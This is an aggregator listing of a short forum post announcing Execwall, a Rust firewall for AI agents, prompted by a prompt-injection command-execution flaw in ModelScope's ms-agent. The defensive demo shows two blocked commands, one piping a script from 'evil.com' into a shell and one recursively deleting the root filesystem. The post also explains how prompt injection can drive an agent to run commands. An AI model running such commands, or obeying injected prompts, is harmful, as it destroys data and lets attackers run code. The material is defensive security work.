Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)

sentra · 22 hours ago · view on HN · tool
quality 5/10 · average
0 net
AI Summary

Execwall is a Rust-based execution firewall for AI agents that mitigates prompt injection attacks via seccomp-BPF filtering, command allowlisting, and namespace isolation, demonstrated against CVE-2026-2256 in ModelScope's agent framework.

Tags
prompt-injection command-injection ai-security llm-agent sandbox seccomp execution-filtering modelscope mitigation
Entities
CVE-2026-2256 ModelScope ms-agent Execwall sundarsub
CVE-2026-2256 just dropped - a prompt injection in ModelScope's ms-agent allows arbitrary OS command execution. CVSS 6.5, no auth required.

  This is exactly why I built Execwall: an execution firewall for AI agents.

  The problem: AI agents that can execute code are one prompt injection away from rm -rf /.

  The solution: A security layer directly embedded in the shell and between app and kernel:

  - Seccomp-BPF filtering - Block dangerous syscalls before they execute
  - Policy engine - Regex allowlist/denylist for commands embedded in shell
  - Namespace isolation - Python sandbox with separate mount/PID/network
  - Rate limiting - Prevent automated exploitation

  Even if an attacker injects a malicious prompt, the command gets blocked at the execution firewall:

  [execwall]$ curl http://evil.com | sh
  [X] DENIED: Network command blocked by policy

  [execwall]$ rm -rf /
  [X] DENIED: Recursive deletion blocked

  Written in Rust. Works with any LLM agent framework.

  GitHub: https://github.com/sundarsub/execwall

  CVE details: https://radar.offseq.com/threat/cve-2026-2256-cwe-94-improper-control-of-generatio-97245d82
← Back to stories